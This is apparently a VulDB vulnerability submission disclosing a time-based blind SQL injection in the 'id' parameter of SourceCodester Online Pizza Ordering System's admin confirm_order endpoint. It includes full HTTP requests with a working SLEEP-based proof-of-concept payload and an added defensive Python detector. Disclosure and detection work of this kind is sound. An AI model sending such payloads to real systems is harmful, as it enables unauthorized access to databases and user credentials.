Title | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
---|
Description | Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391
Tested On:
Ubuntu Server 22.04.3 LTS
Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order
Request:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1
Affected Parameter:
id
Proof of Concept:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
Impact:
A SQL injection vulnerability of this kind can result in unauthorized access to restricted data such as user information and credentials.
Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. It is reachable through a POST request to /admin/ajax.php?action=confirm_order, which is issued by the 'view order' functionality in /admin/index.php?page=orders. Because the 'id' parameter in that POST request is not properly sanitized, a specially crafted request that manipulates it results in SQL injection, allowing malicious actors to view restricted data and extract the underlying database.
|
---|
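As an added example, not part of the submission or of the vendor's code, the following Python check shows how a defender can catch this request pattern at a proxy or in request logs: `id` must be a single plain integer, MySQL time-delay functions in the parameter are flagged, and an abnormally slow response is correlated with a malformed `id`, which is how a time-based blind probe like the proof of concept above stands out. The sample traffic is constructed from the advisory's normal request and its proof-of-concept body; the 5-second threshold is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed sample traffic modelled on the advisory: (action, POST body, response time in s).
# The second body is the proof-of-concept payload quoted in the submission.
SAMPLE_REQUESTS = [
    ("confirm_order", "id=1", 0.04),
    ("confirm_order", "id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)", 15.2),
    ("confirm_order", "id=7", 0.05),
    ("list_orders", "page=2", 0.03),
]

# confirm_order takes exactly one numeric order id; anything else is malformed input.
INT_PARAM = re.compile(r"\d{1,10}")
# MySQL delay primitives that time-based blind injection depends on (token followed by '(').
DELAY_FUNCS = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
# Assumed threshold: confirming an order is a single indexed write, so multi-second responses are abnormal.
SLOW_THRESHOLD = 5.0


def inspect_request(action, body, elapsed):
    """Return finding strings for one admin/ajax.php request (empty list = looks normal)."""
    if action != "confirm_order":
        return []
    findings = []
    ids = parse_qs(body, keep_blank_values=True).get("id", [])
    if len(ids) != 1:
        findings.append("id missing or repeated")
    for value in ids:
        if not INT_PARAM.fullmatch(value):
            findings.append(f"id not an integer: {value!r}")
        if DELAY_FUNCS.search(value):
            findings.append("time-delay SQL function in id")
    if elapsed > SLOW_THRESHOLD:
        findings.append(f"slow response: {elapsed:.1f}s")
    # A malformed id together with an abnormally slow response is the signature of a blind time-based probe.
    if elapsed > SLOW_THRESHOLD and any(f.startswith("id not an integer") for f in findings):
        findings.append("likely time-based blind SQL injection")
    return findings


def scan(requests=SAMPLE_REQUESTS):
    """Map each suspicious request body to its findings; clean requests are omitted."""
    flagged = {}
    for action, body, elapsed in requests:
        findings = inspect_request(action, body, elapsed)
        if findings:
            flagged[body] = findings
    return flagged


if __name__ == "__main__":
    for body, findings in scan().items():
        print(body, "->", "; ".join(findings))
```

The same integer check is also the server-side fix: cast or validate `id` before it reaches the query, and bind it as a parameter rather than concatenating it.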
| User | simon.davis8080 (ID 54983) |
|---|---|
| Submission | 10/05/2023 10:30 (8 months ago) |
| Moderation | 10/05/2023 12:01 (2 hours later) |
| Status | Accepted |
| VulDB Entry | 241384 |